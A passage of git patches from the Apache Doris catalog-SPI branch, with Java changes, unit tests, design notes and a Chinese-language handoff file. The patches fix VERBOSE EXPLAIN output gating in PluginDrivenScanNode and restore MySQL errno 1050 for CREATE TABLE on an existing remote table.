`dataFileNum/deleteFileNum/deleteSplitNum`) **only when** +`"paimon".equals(catalog.getType())`. The parent `FileScanNode` emits it **unconditionally** under +`VERBOSE && !isBatchMode()`. + +## Root Cause + +The override reimplements the `FileScanNode` explain body (custom format, no `super` call) and re-emits each +inherited line by hand. The VERBOSE backends re-emission was wrongly conjoined with a paimon source-name +gate (FIX-PAIMON-EXPLAIN-GAP `d4526013364`), instead of mirroring the parent gate verbatim. Effects: +1. **MaxCompute (and trino-connector) VERBOSE EXPLAIN regression** — both legacy nodes + (`MaxComputeScanNode`/`TrinoConnectorScanNode extends FileQueryScanNode`) inherited the unconditional + block; after SPI cut-over they route through `PluginDrivenScanNode` and lost it. +2. **Layering violation** — a hardcoded source-name branch in the connector-agnostic generic node (project + rule: emit universal `FileScanNode` info unconditionally; delegate connector-specific via the SPI). +3. **False inline comment** claiming the gate kept "es/jdbc/max_compute VERBOSE output byte-unchanged". + +## Fix + +`fe/fe-core/.../datasource/PluginDrivenScanNode.java` — removed the +`&& "paimon".equals(desc.getTable().getDatabase().getCatalog().getType())` conjunct, leaving +`if (detailLevel == TExplainLevel.VERBOSE && !isBatchMode())` (identical to the parent gate), and rewrote +the inline comment to state the unconditional-universal rationale. `paimonNativeReadSplits` stays behind the +`ConnectorScanPlanProvider.appendExplainInfo` delegation (unchanged). + +### Scope (corrected by red-team — broader than the review's "maxcompute" framing) + +`SPI_READY_TYPES = {jdbc, es, trino-connector, max_compute, paimon}` all route through this node. The fix +emits the block for all five: +- **paimon:** unchanged (still emitted; byte-identical). +- **maxcompute, trino-connector:** **restored** pre-cutover legacy behavior. +- **es, jdbc:** **new** (harmless) VERBOSE output — the rule-mandated, consistent choice; same category as + the sibling `partition=N/M` / `pushdown agg=` lines already emitted unconditionally for them. Paths render + synthetic (`es:///`, `jdbc://virtual`); NPE-safe (`PluginDrivenSplit extends FileSplit` → + always a `FileScanRange`; `getDeleteFiles` null-guarded). + +Out of scope (flagged, not fixed): the sibling `"es_http".equals(...file_format_type)` `ES terminate_after:` +gate (R3-LAYER-2) — survives the rule literally (file-format key, not `getType()`); separate residual. + +## Tests + +New `PluginDrivenScanNodeVerboseExplainTest` (3 tests, `CALLS_REAL_METHODS` + `Deencapsulation` partial-node +pattern, empty `scanRangeLocations` so the loop is skipped and only the bare `backends:` header prints): +- `verboseEmitsBackendsBlockForNonPaimonConnector` (`max_compute`, VERBOSE → contains `backends:`). +- `verboseEmitsBackendsBlockForPaimon` (parity — paimon still emits). +- `nonVerboseOmitsBackendsBlock` (NORMAL → no `backends:`; pins the surviving VERBOSE gate). + +**RED→GREEN verified empirically:** with the gate re-added, `verboseEmitsBackendsBlockForNonPaimonConnector` +fails (actual `max_compute` output has no `backends:`); with the gate removed, all 3 pass. The negative +NORMAL-level test passing proves `backends:` is genuinely conditional, so the positive assertions are +meaningful. + +## Result + +- `PluginDrivenScanNode*Test` (all classes incl. the new one) GREEN; fe-core compiles; checkstyle clean + (validate phase). Build cache disabled. +- Behavioral change is **diagnostic-only** (VERBOSE EXPLAIN text); zero query/data-path impact. No + regression test pins these connectors' VERBOSE EXPLAIN text (red-team + independent grep both empty). +- **e2e:** paimon e2e gated (`enablePaimonTest=false`); maxcompute/es/jdbc VERBOSE-EXPLAIN e2e needs live + endpoints (offline) → none added (documented; fail-loud). diff --git a/plan-doc/task-list-P6-fixes.md b/plan-doc/task-list-P6-fixes.md index de9b5a66fab914..d54f36245d00b2 100644 --- a/plan-doc/task-list-P6-fixes.md +++ b/plan-doc/task-list-P6-fixes.md @@ -18,8 +18,13 @@ verified on hadoop 3.4.2); BE `toMap()` stays defaults-laden (byte-parity). Parity for filesystem/jdbc/hms; DLF deviation = `DV-036` (accept). 28/0 fe-filesystem-hdfs UT + 279/0/1skip paimon + connector glue test; checkstyle + import-check clean; e2e gated/not-run. See FIX-C2-HDFS-XML-{design,summary}.md. -- [ ] **P6-R3-residual** drop `"paimon".equals` gate on `appendBackendScanRangeDetail`; emit unconditionally under VERBOSE - (fixes MaxCompute regression + generic-node-no-source-branch rule + false comment). +- [x] **P6-R3-residual** drop `"paimon".equals` gate on `appendBackendScanRangeDetail`; emit unconditionally under VERBOSE + — **DONE** — removed the source-name conjunct (gate now `VERBOSE && !isBatchMode()`, identical to parent + `FileScanNode`) + rewrote the false comment. **Scope (red-team-corrected, broader than review's "maxcompute"):** + all 5 `SPI_READY_TYPES` route through this node — paimon unchanged, maxcompute/trino-connector parity-RESTORED, + es/jdbc gain new (NPE-safe, rule-mandated) VERBOSE output. New `PluginDrivenScanNodeVerboseExplainTest` (3 tests, + RED→GREEN mutation-verified); 45/0/0 `PluginDrivenScanNode*` + checkstyle clean; e2e gated/not-run. + es_http `ES terminate_after:` gate left as separate residual (R3-LAYER-2). See FIX-R3-RESIDUAL-{design,summary}.md. - [ ] **P6-R1-table** bridge `createTable`: add `remoteExists && !ifNotExists` arm → `ERR_TABLE_EXISTS_ERROR` (1050). - [ ] **P6-C4** thread `hive_metastore_client_timeout_second` through `ConnectorContext.getEnvironment()`. - [ ] **P6-R2-catalog** warn-and-strip now-dead `meta.cache.paimon.table.*` keys at CREATE CATALOG. From 287e7e5e78aec037a1a1ddcef92875c8677dbc08 Mon Sep 17 00:00:00 2001 From: morningman Date: Fri, 19 Jun 2026 08:52:30 +0800 Subject: [PATCH 105/128] =?UTF-8?q?docs(catalog-spi):=20P6=20R3-residual?= =?UTF-8?q?=20fix=20done=20=E2=86=92=20HANDOFF=20next=20=3D=20R1-table?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit R3-residual (drop "paimon".equals VERBOSE-backends gate in PluginDrivenScanNode) committed as 44499f073e8. Scope corrected by design red-team: all 5 SPI_READY_TYPES affected (paimon unchanged / maxcompute+trino restored / es+jdbc new NPE-safe output). es_http ES terminate_after gate left as separate residual (R3-LAYER-2). Next prioritized fix = R1-table (createTable remoteExists && !ifNotExists -> ERR_TABLE_EXISTS_ERROR 1050). Co-Authored-By: Claude Opus 4.8 (1M context) --- plan-doc/HANDOFF.md | 36 +++++++++++++++++++----------------- 1 file changed, 19 insertions(+), 17 deletions(-) diff --git a/plan-doc/HANDOFF.md b/plan-doc/HANDOFF.md index e609d33ff527e6..894cb3ba6982ff 100644 --- a/plan-doc/HANDOFF.md +++ b/plan-doc/HANDOFF.md @@ -6,22 +6,22 @@ --- -# 🎯 下一个 session 的任务 — **P6 修复进行中:C2 DONE → 下一个 = R3-residual (MINOR)** +# 🎯 下一个 session 的任务 — **P6 修复进行中:R3-residual DONE → 下一个 = R1-table (MINOR)** > **进度(2026-06-19)**:P6 发现项按 `task-list-P6-fixes.md` 的 prioritized list 逐个修(单任务循环: > design → 红队 → 实现 → impl 验证 → build+UT → commit)。 -> **✅ C1 (MinIO, MAJOR) 已完成 `9967846ef64`**(minio.* 别名进共享 fe-filesystem-s3 + 保留 tuning 默认)。 -> **✅ C2 (HDFS XML, MAJOR) 已完成并提交 `e95128aed5b`**:`HdfsFileSystemProperties implements HadoopStorageProperties`; -> FE `toHadoopConfigurationMap()` 返回**defaults-free** 图(XML+HA+auth 键,`new Configuration(false)`,无 Hadoop 框架默认), -> BE `toMap()` 仍 defaults-laden(byte-parity)。**defaults-free 是红队关键发现**:naive 全 `backendConfigProperties` 带 62 个 -> `fs.s3a.*` 默认,多后端(对象存储+HDFS-XML)会把 HDFS 默认 `fs.s3a.path.style.access=false` 盖掉 S3/MinIO 的 tuned `true` -> (相对当前分支的回归;hadoop 3.4.2 实测证实)。filesystem/jdbc/hms parity;DLF 偏差 accept(`DV-036`); -> `fs.hdfs.impl.disable.cache` pre-existing 缺口(`DV-037`,非 C2 引入,out-of-scope)。另修 4 处过时注释。 -> 28/0 fe-filesystem-hdfs UT + 279/0/1skip paimon + 连接器端到端 glue test;checkstyle+import-check 干净;**docker e2e 未跑**。 -> 设计/红队/impl-verify 结论详见 `designs/FIX-C2-HDFS-XML-{design,summary}.md`(一道 design 红队 6 agent + 一道 impl 对抗验证)。 -> **下一个 = R3-residual (MINOR)**:去 `PluginDrivenScanNode` 的 `"paimon".equals(catalog.getType())` gate,VERBOSE 下 -> 无条件 emit `appendBackendScanRangeDetail()`(同时修 MaxCompute VERBOSE 回归 + 违反「generic node 不按 source name 分支」规则 + 假注释)。 -> 然后 4 个 MINOR(R1-table / C4 / R2-catalog / R3-catalog),最后 accept-as-deviation 批次。 +> **✅ C1 (MinIO, MAJOR) `9967846ef64`** / **✅ C2 (HDFS XML, MAJOR) `e95128aed5b`**(详见 git log + 各自 design/summary)。 +> **✅ R3-residual (MINOR) 已完成**:去 `PluginDrivenScanNode.getNodeExplainString` 的 `"paimon".equals(getType())` +> gate,VERBOSE backends 块改无条件 emit(gate 变 `VERBOSE && !isBatchMode()`,与父 `FileScanNode` 完全一致)+ 重写假注释。 +> **红队纠正了 scope**(比 review 的「maxcompute」更广):`SPI_READY_TYPES={jdbc,es,trino-connector,max_compute,paimon}` 全走 +> 此 node → paimon 不变、maxcompute/trino **恢复** pre-cutover 块、es/jdbc 获得**新增**(NPE-safe、合规则)VERBOSE 输出 +> (`PluginDrivenSplit extends FileSplit` 恒有 FileScanRange + `getDeleteFiles` null-guard;es/jdbc 渲染合成路径 +> `es://idx/shard`、`jdbc://virtual`)。新 `PluginDrivenScanNodeVerboseExplainTest`(3 测,**RED→GREEN 突变验证**: +> 重加 gate → 非-paimon 测变红);45/0/0 `PluginDrivenScanNode*` UT + checkstyle 干净;**e2e gated/未跑**。 +> es_http `ES terminate_after:` gate 作**独立残留**留下(R3-LAYER-2,键 file-format-type 非 getType(),规则字面不违反)。 +> 设计/红队结论详见 `designs/FIX-R3-RESIDUAL-{design,summary}.md`(design 红队 3 lens finder→verifier `wf_3518653b-3cb`)。 +> **下一个 = R1-table (MINOR)**:bridge `createTable` 补 `remoteExists && !ifNotExists` 臂 → 报 `ERR_TABLE_EXISTS_ERROR`(1050)。 +> 然后 3 个 MINOR(C4 / R2-catalog / R3-catalog 可合一),最后 accept-as-deviation 批次。 paimon connector 全功能路径 clean-room 对抗 review(6 维度 + 7 缺口线,2 波,零历史先验)**已完成**。 报告:[`reviews/P6-paimon-fullpath-cleanroom-2026-06-18.md`](./reviews/P6-paimon-fullpath-cleanroom-2026-06-18.md)(未跟踪,待 vet+commit)。 @@ -56,9 +56,11 @@ paimon connector 全功能路径 clean-room 对抗 review(6 维度 + 7 缺口 - ✅ **C2 HDFS XML**(MAJOR)— **DONE `e95128aed5b`**(`HdfsFileSystemProperties implements HadoopStorageProperties`; FE `toHadoopConfigurationMap()` 返 **defaults-free** 图避免多后端 `fs.s3a.*` clobber,BE `toMap()` 仍 defaults-laden; DLF=DV-036、disable-cache=DV-037;28/0+279/0/1skip+glue test)。 - - **R3 residual**(MINOR,下一个):去 `PluginDrivenScanNode` 的 `"paimon".equals(catalog.getType())` gate,VERBOSE 下无条件 - emit `appendBackendScanRangeDetail()`(同时修 MaxCompute VERBOSE 回归 + 违反「generic node 不按 source name 分支」规则 + 假注释)。 - - **R1 table**(MINOR):bridge `createTable` 补 `remoteExists && !ifNotExists` 臂报 `ERR_TABLE_EXISTS_ERROR`(1050)。 + - ✅ **R3 residual**(MINOR)— **DONE**:去 `PluginDrivenScanNode.getNodeExplainString` 的 `"paimon".equals(getType())` + gate,VERBOSE backends 块无条件 emit(与父 `FileScanNode` gate 一致)+ 重写假注释。红队纠正 scope=全 5 个 SPI 连接器 + (paimon 不变 / maxcompute+trino 恢复 / es+jdbc 新增 NPE-safe 输出);新 UT 3 测 RED→GREEN;45/0/0 + checkstyle 干净。 + es_http gate 留作 R3-LAYER-2 独立残留。详见 `designs/FIX-R3-RESIDUAL-{design,summary}.md`。 + - **R1 table**(MINOR,下一个):bridge `createTable` 补 `remoteExists && !ifNotExists` 臂报 `ERR_TABLE_EXISTS_ERROR`(1050)。 - **C4 / R2-catalog / R3-catalog**(MINOR,可合一):HMS socket timeout 透传 `hive_metastore_client_timeout_second` / `meta.cache.paimon.table.*` warn-and-strip(键已 dead)/ `listDatabaseNames` `LOG.warn` 带 catalog 名(择一)。 - 其余 MINOR/NIT + wave2 新增(全 intentional-deviation):报告已标「文档化为接受偏离」,逐条 accept-as-deviation(含用户签字)。 @@ -84,7 +86,7 @@ paimon connector 全功能路径 clean-room 对抗 review(6 维度 + 7 缺口 --- # 📦 仓库 / 进度状态 -- **HEAD = `e95128aed5b`**(P6 修复 C2 HDFS XML;前序 `9967846ef64` C1 MinIO)。当前分支 **`catalog-spi-07-paimon`**(非 master); +- **HEAD = `44499f073e8`**(P6 修复 R3-residual;前序 `e95128aed5b` C2 HDFS XML、`9967846ef64` C1 MinIO)。当前分支 **`catalog-spi-07-paimon`**(非 master); 已同步 push 到 `master-catalog-spi-07-paimon`(= PR [#64445](https://github.com/apache/doris/pull/64445) head, force-with-lease)。 - **主线(P0–P5)**:paimon connector SPI cutover + round-3 clean-room review 的 4 个 user-approved fix 全完成 From f652b40d21096973c805257e7d39b7f4b3d1f218 Mon Sep 17 00:00:00 2001 From: morningman Date: Fri, 19 Jun 2026 09:26:36 +0800 Subject: [PATCH 106/128] =?UTF-8?q?fix:=20FIX-R1-TABLE=20=E2=80=94=20repor?= =?UTF-8?q?t=20MySQL=20errno=201050=20for=20CREATE=20TABLE=20on=20a=20remo?= =?UTF-8?q?te-existing=20table?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Root cause: PluginDrivenExternalCatalog.createTable (the generic SPI bridge for all SPI_READY_TYPES — paimon/maxcompute/es/jdbc/trino) reported ERR_TABLE_EXISTS_ERROR (MySQL errno 1050 / SQLSTATE 42S01) only for the local-cache-conflict arm (`if (localExists)`). A table existing ONLY remotely (absent from this FE's cache — stale cache / other-FE / external Spark/Flink create), created without IF NOT EXISTS, fell through to metadata.createTable -> DorisConnectorException -> re-wrapped as a generic DdlException (errno ERR_UNKNOWN_ERROR = 0). CREATE still failed, but the documented MySQL 1050 contract (some ORMs / migration tools branch on SQLSTATE 42S01) was lost. The bridge ported only the local arm's 1050 report. Both legacy ops reported 1050 for BOTH arms: legacy paimon PaimonMetadataOps.performCreateTable (remote :195, local :212) and legacy maxcompute MaxComputeMetadataOps.createTableImpl (remote :184, local :195). So 1050-for-remote is exact parity for both live cut-over connectors. Solution: drop the `if (localExists)` guard. Reaching that point already guarantees (remoteExists || localExists) && !isIfNotExists, so report ERR_TABLE_EXISTS_ERROR unconditionally there — short-circuiting before metadata.createTable (also keeps a local-cache-only conflict from being created remotely). Diagnostic/contract-only change (error code/SQLSTATE/message); the CREATE outcome (failure) is unchanged; metadata.createTable is no longer reached for a remote-existing table (it only threw anyway). For non-create-overriding connectors (es/jdbc/trino) a CREATE on an existing table now surfaces "already exists" instead of the old fall-through error — benign, arguably more accurate. Tests (PluginDrivenExternalCatalogDdlRoutingTest): rewrote testCreateTableExistingTableWithoutIfNotExistsStillErrors -> testCreateTableExistingRemoteTableWithoutIfNotExistsReportsErrno1050 (it encoded the buggy fall-through, verify(metadata).createTable); it now asserts getMysqlErrorCode() == ERR_TABLE_EXISTS_ERROR + verify(metadata, never()).createTable. Strengthened testCreateTableLocalConflictWithoutIfNotExistsRejects with the same errno assertion (the two together pin "report 1050 on EITHER arm"). RED->GREEN verified empirically: re-adding the guard turns the remote test red (buggy path falls through to the no-op mock createTable -> nothing thrown). 26/0/0 DdlRouting + 12/0/0 Engine UT + checkstyle clean; e2e gated/not-run. Co-Authored-By: Claude Opus 4.8 (1M context) --- .../PluginDrivenExternalCatalog.java | 21 ++-- ...inDrivenExternalCatalogDdlRoutingTest.java | 59 +++++----- plan-doc/designs/FIX-R1-TABLE-design.md | 103 ++++++++++++++++++ plan-doc/designs/FIX-R1-TABLE-summary.md | 57 ++++++++++ plan-doc/task-list-P6-fixes.md | 8 +- 5 files changed, 210 insertions(+), 38 deletions(-) create mode 100644 plan-doc/designs/FIX-R1-TABLE-design.md create mode 100644 plan-doc/designs/FIX-R1-TABLE-summary.md diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalCatalog.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalCatalog.java index 211c7600e1963b..6014d607100e37 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalCatalog.java +++ b/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalCatalog.java @@ -301,16 +301,17 @@ public boolean createTable(CreateTableInfo createTableInfo) throws UserException getName(), createTableInfo.getDbName(), createTableInfo.getTableName()); return true; } - // !IF NOT EXISTS: a table present ONLY in the local FE cache (folded onto an existing name - // under lower_case_meta_names while the case-sensitive remote has no such table) must be - // rejected HERE -- connector.createTable would otherwise CREATE it remotely instead of - // failing. Mirrors legacy PaimonMetadataOps.performCreateTable:206-214 (local arm). A - // remote-only conflict still falls through to connector.createTable, which throws - // "already exists" -> DdlException (unchanged). - if (localExists) { - ErrorReport.reportDdlException(ErrorCode.ERR_TABLE_EXISTS_ERROR, - createTableInfo.getTableName()); - } + // !IF NOT EXISTS: a table that already exists -- whether remotely (connector) OR only in the + // local FE cache (a case-variant name folded onto an existing table under lower_case_meta_names + // while the case-sensitive remote has no such table) -- must be rejected HERE with MySQL errno + // 1050 (ERR_TABLE_EXISTS_ERROR / SQLSTATE 42S01). Mirrors legacy {Paimon,MaxCompute}MetadataOps, + // which report ERR_TABLE_EXISTS_ERROR for BOTH the remote arm (PaimonMetadataOps:195 / + // MaxComputeMetadataOps:184) and the local arm (:212 / :195). Reporting before + // metadata.createTable also keeps a local-cache-only conflict from being CREATED remotely + // (the connector would otherwise create a duplicate). Reaching here already guarantees + // (remoteExists || localExists) && !isIfNotExists; reportDdlException throws. + ErrorReport.reportDdlException(ErrorCode.ERR_TABLE_EXISTS_ERROR, + createTableInfo.getTableName()); } ConnectorCreateTableRequest request = CreateTableInfoToConnectorRequestConverter .convert(createTableInfo, db.getRemoteName()); diff --git a/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenExternalCatalogDdlRoutingTest.java b/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenExternalCatalogDdlRoutingTest.java index 7494eb972dbc2e..9e8222483bfcaf 100644 --- a/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenExternalCatalogDdlRoutingTest.java +++ b/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenExternalCatalogDdlRoutingTest.java @@ -19,6 +19,7 @@ import org.apache.doris.catalog.Env; import org.apache.doris.common.DdlException; +import org.apache.doris.common.ErrorCode; import org.apache.doris.common.UserException; import org.apache.doris.connector.api.Connector; import org.apache.doris.connector.api.ConnectorMetadata; @@ -521,34 +522,34 @@ public void testCreateTableIfNotExistsExistingLocalTableReturnsTrue() throws Exc } @Test - public void testCreateTableExistingTableWithoutIfNotExistsStillErrors() throws Exception { + public void testCreateTableExistingRemoteTableWithoutIfNotExistsReportsErrno1050() { + // FIX-R1-TABLE: a table that exists REMOTELY but is absent from this FE's cache (stale cache / + // other-FE / external create), created without IF NOT EXISTS, must be rejected with MySQL errno + // 1050 (ERR_TABLE_EXISTS_ERROR / SQLSTATE 42S01) -- legacy parity ({Paimon,MaxCompute}MetadataOps + // both report 1050 for the remote arm). The connector is NOT consulted (the FE short-circuits). ExternalDatabase db = mockExternalDatabase(); Mockito.when(db.getRemoteName()).thenReturn("DB1"); catalog.dbNullableResult = db; ConnectorTableHandle handle = Mockito.mock(ConnectorTableHandle.class); Mockito.when(metadata.getTableHandle(session, "DB1", "t1")).thenReturn(Optional.of(handle)); - - try (MockedStatic conv = - Mockito.mockStatic(CreateTableInfoToConnectorRequestConverter.class)) { - ConnectorCreateTableRequest req = Mockito.mock(ConnectorCreateTableRequest.class); - conv.when(() -> CreateTableInfoToConnectorRequestConverter.convert(Mockito.any(), Mockito.any())) - .thenReturn(req); - Mockito.doThrow(new DorisConnectorException("Table 't1' already exists in database 'DB1'")) - .when(metadata).createTable(session, req); - CreateTableInfo info = Mockito.mock(CreateTableInfo.class); - Mockito.when(info.getDbName()).thenReturn("db1"); - Mockito.when(info.getTableName()).thenReturn("t1"); - Mockito.when(info.isIfNotExists()).thenReturn(false); - - // WHY (Rule 9 / Rule 12): existing table + NO IF NOT EXISTS must NOT short-circuit -- it - // must reach connector.createTable and surface its "already exists" as DdlException - // (fail-loud, legacy parity). A mutation that returns true on `exists` regardless of - // isIfNotExists() would skip createTable -> no throw -> this assertThrows + verify go red. - DdlException ex = Assertions.assertThrows(DdlException.class, () -> catalog.createTable(info)); - Assertions.assertTrue(ex.getMessage().contains("already exists")); - Mockito.verify(metadata).createTable(session, req); - Mockito.verify(mockEditLog, Mockito.never()).logCreateTable(Mockito.any()); - } + CreateTableInfo info = Mockito.mock(CreateTableInfo.class); + Mockito.when(info.getDbName()).thenReturn("db1"); + Mockito.when(info.getTableName()).thenReturn("t1"); + Mockito.when(info.isIfNotExists()).thenReturn(false); + + // WHY (Rule 9 / Rule 12): pre-fix the bridge gated the 1050 report on localExists only, so a + // remote-ONLY conflict fell through to metadata.createTable and surfaced a GENERIC DdlException + // (errno ERR_UNKNOWN_ERROR = 0) -- silently dropping the documented MySQL 1050 contract some + // ORMs branch on. The fix reports 1050 at the FE before the connector. MUTATION: restoring the + // `if (localExists)` guard makes this remote-only case (localExists=false) fall through -> errno + // reverts to 0 and metadata.createTable IS called -> the errno assertion AND the never().createTable + // verify both go red. + DdlException ex = Assertions.assertThrows(DdlException.class, () -> catalog.createTable(info)); + Assertions.assertEquals(ErrorCode.ERR_TABLE_EXISTS_ERROR, ex.getMysqlErrorCode(), + "remote-existing table without IF NOT EXISTS must surface MySQL errno 1050 (legacy parity)"); + Assertions.assertTrue(ex.getMessage().contains("already exists")); + Mockito.verify(metadata, Mockito.never()).createTable(Mockito.any(), Mockito.any()); + Mockito.verify(mockEditLog, Mockito.never()).logCreateTable(Mockito.any()); } @Test @@ -576,11 +577,15 @@ public void testCreateTableLocalConflictWithoutIfNotExistsRejects() throws Excep Mockito.when(info.isIfNotExists()).thenReturn(false); // WHY (Rule 9 / Rule 12): a local-ONLY conflict without IF NOT EXISTS must be REJECTED at the FE - // level (ERR_TABLE_EXISTS_ERROR), never handed to connector.createTable. The pre-fix code - // consumed the existence probe only in the IF NOT EXISTS branch and fell through here, calling - // metadata.createTable -> created a duplicate remote table. Mutation (drop the localExists - // guard) -> no throw + createTable called -> both assertions go red. + // level with MySQL errno 1050 (ERR_TABLE_EXISTS_ERROR), never handed to connector.createTable + // (which would create a duplicate remote table under lower_case_meta_names case-folding). Paired + // with testCreateTableExistingRemoteTableWithoutIfNotExistsReportsErrno1050, this pins that the + // existence rejection covers EITHER arm: MUTATION re-narrowing the report to the remote arm only + // (e.g. `if (remoteExists)`) lets this local-only case (remoteExists=false) fall through -> + // createTable called + errno reverts to ERR_UNKNOWN_ERROR -> the asserts below go red. DdlException ex = Assertions.assertThrows(DdlException.class, () -> catalog.createTable(info)); + Assertions.assertEquals(ErrorCode.ERR_TABLE_EXISTS_ERROR, ex.getMysqlErrorCode(), + "local-cache conflict without IF NOT EXISTS must surface MySQL errno 1050"); Assertions.assertTrue(ex.getMessage().contains("already exists")); Mockito.verify(metadata, Mockito.never()).createTable(Mockito.any(), Mockito.any()); Mockito.verify(mockEditLog, Mockito.never()).logCreateTable(Mockito.any()); diff --git a/plan-doc/designs/FIX-R1-TABLE-design.md b/plan-doc/designs/FIX-R1-TABLE-design.md new file mode 100644 index 00000000000000..bf5fd64d7cdcfd --- /dev/null +++ b/plan-doc/designs/FIX-R1-TABLE-design.md @@ -0,0 +1,103 @@ +# FIX-R1-TABLE — restore MySQL errno 1050 for CREATE TABLE on a remote-existing table + +> Single-task loop (AGENT-PLAYBOOK): design → design red-team → implement → impl verify → build+UT → commit → summary. +> Source finding: `reviews/P6-paimon-fullpath-cleanroom-2026-06-18.md` §R1 (table) (MINOR, regression, confirmed). + +# Problem + +`PluginDrivenExternalCatalog.createTable` (the **generic** SPI bridge — paimon/maxcompute/es/jdbc/trino all +route through it) reports `ERR_TABLE_EXISTS_ERROR` (MySQL errno **1050**, SQLSTATE `42S01`, "Table '%s' +already exists") **only for the local-cache-conflict arm**. A table that exists **only remotely** (absent +from this FE's cache) with no `IF NOT EXISTS` falls through to `metadata.createTable`, which throws +`DorisConnectorException("…already exists")`, re-wrapped at `:319` as a **generic** `DdlException` +(errno 0 / `ERR_UNKNOWN_ERROR`). The CREATE still fails — only the error code / SQLSTATE / message regress. + +```java +// PluginDrivenExternalCatalog.java:298-314 (current) +if (remoteExists || localExists) { + if (createTableInfo.isIfNotExists()) { ... return true; } // both arms no-op on IF NOT EXISTS + if (localExists) { // <-- LOCAL arm only + ErrorReport.reportDdlException(ERR_TABLE_EXISTS_ERROR, createTableInfo.getTableName()); + } +} +// remoteExists && !localExists && !ifNotExists falls through to metadata.createTable -> generic DdlException +``` + +# Root Cause + +The bridge re-implements legacy's remote-then-local existence probe but only ported the **local** arm's +1050 report. Both legacy ops reported 1050 for **both** arms: +- legacy paimon `PaimonMetadataOps.performCreateTable`: remote `:195`, local `:212`. +- legacy maxcompute `MaxComputeMetadataOps.createTableImpl`: remote `:184`, local `:195`. + +So 1050-for-remote is exact parity for **both** live cut-over connectors, not a paimon-only concern. + +# Design + +Drop the `if (localExists)` guard. At that point the code is already inside `if (remoteExists || localExists)` +and past the `isIfNotExists()` early-return, so `(remoteExists || localExists) && !ifNotExists` is +guaranteed — report `ERR_TABLE_EXISTS_ERROR` unconditionally there. `ErrorReport.reportDdlException` throws, +short-circuiting **before** `metadata.createTable` (so the remote-only case no longer reaches the connector). + +```java +if (remoteExists || localExists) { + if (createTableInfo.isIfNotExists()) { ... return true; } + // !IF NOT EXISTS: a table existing remotely OR only in the local FE cache must be rejected here with + // MySQL errno 1050, mirroring legacy {Paimon,MaxCompute}MetadataOps (both report ERR_TABLE_EXISTS_ERROR + // for the remote arm AND the local arm). Reporting before metadata.createTable also keeps the + // local-cache-only conflict from being CREATED remotely (lower_case_meta_names case-fold). + ErrorReport.reportDdlException(ErrorCode.ERR_TABLE_EXISTS_ERROR, createTableInfo.getTableName()); +} +``` + +This is the minimal change and is **byte-equivalent to legacy** for both arms. + +## Behavioral delta + +- **remote-only existing table, no IF NOT EXISTS:** generic `DdlException` → **`DdlException` with errno + 1050** + message "Table '' already exists" (legacy parity). CREATE still fails; `metadata.createTable` + is no longer called for this case (it only threw anyway — no lost side effect). +- **local-cache conflict / IF NOT EXISTS / create-succeeds:** unchanged. +- **Generic bridge → applies to every SPI connector** (paimon/maxcompute/es/jdbc/trino). 1050 for an + existing table is the universally-correct MySQL contract; parity verified for the two live connectors. + +# Implementation Plan + +Single edit in `PluginDrivenExternalCatalog.java`: replace the `if (localExists) { report }` arm with an +unconditional `report` (and update the comment `:304-313`). No SPI/connector/BE change. + +# Risk Analysis + +- **Diagnostic/contract-only** (error code/SQLSTATE/message); CREATE outcome (failure) unchanged → MINOR. +- errno 1050 is a documented MySQL contract some ORMs/migration tools branch on (SQLSTATE 42S01) → worth + restoring (MINOR, not NIT). +- **Reachability narrow:** table exists remotely but absent from this FE cache — stale cache / other-FE / + external (Spark/Flink) create. +- **No lost side effect:** the connector's createTable for an existing table only throws; short-circuiting + before it changes nothing but the surfaced error. +- **Cross-connector (red-team `wf_19fd7785-165`, 0 actionable):** the change is in the shared bridge; parity + verified for paimon + maxcompute (both legacy ops report 1050 for the remote AND local arm). No connector + relied on the remote-exists fall-through for a side effect, and no regression/e2e test pins the old generic + message or asserts `createTable` is called on a remote-existing table. **Nuance (NIT):** es/jdbc/trino + implement `getTableHandle` (so `remoteExists` can be true) but do not override `createTable`; for those + connectors a `CREATE TABLE` on an *existing* table now surfaces "already exists" (1050) instead of the old + fall-through error — benign and arguably more accurate; the non-existing-table path is unchanged. + +# Test Plan + +## Unit Tests (`PluginDrivenExternalCatalogDdlRoutingTest`) + +- **Update** `testCreateTableExistingTableWithoutIfNotExistsStillErrors` (`:523`) — it currently encodes the + **buggy** fall-through (`verify(metadata).createTable(...)`). Rewrite to the corrected contract: + remote-exists + !IF NOT EXISTS → `DdlException` with `getMysqlErrorCode() == ERR_TABLE_EXISTS_ERROR`, and + `verify(metadata, never()).createTable(...)` (short-circuit before the connector) + no editlog. This is + the **mutation-killing** test: restoring the `if (localExists)` guard makes the remote case fall through → + errno reverts to `ERR_UNKNOWN_ERROR` and createTable is called → red. +- **Strengthen** `testCreateTableLocalConflictWithoutIfNotExistsRejects` (`:555`) — add + `getMysqlErrorCode() == ERR_TABLE_EXISTS_ERROR` so both arms pin the 1050 contract (local arm already + passed pre-fix; this documents the unified contract). + +## E2E Tests + +Reaching "remote exists, local-cache absent" needs multi-FE or an external create; paimon e2e is gated +(`enablePaimonTest=false`). → no e2e added (documented; fail-loud). diff --git a/plan-doc/designs/FIX-R1-TABLE-summary.md b/plan-doc/designs/FIX-R1-TABLE-summary.md new file mode 100644 index 00000000000000..61c63edccbeefc --- /dev/null +++ b/plan-doc/designs/FIX-R1-TABLE-summary.md @@ -0,0 +1,57 @@ +# FIX-R1-TABLE — Summary + +> Source finding: `reviews/P6-paimon-fullpath-cleanroom-2026-06-18.md` §R1 (table) (MINOR, regression). +> Design: `FIX-R1-TABLE-design.md`. Design red-team: `wf_19fd7785-165` (2 lenses, finder→verifier, 0 actionable). + +## Problem + +`PluginDrivenExternalCatalog.createTable` (the **generic** SPI bridge for all `SPI_READY_TYPES` — +paimon/maxcompute/es/jdbc/trino) reported `ERR_TABLE_EXISTS_ERROR` (MySQL errno **1050** / SQLSTATE `42S01`) +only for the **local-cache-conflict** arm. A table existing **only remotely** (absent 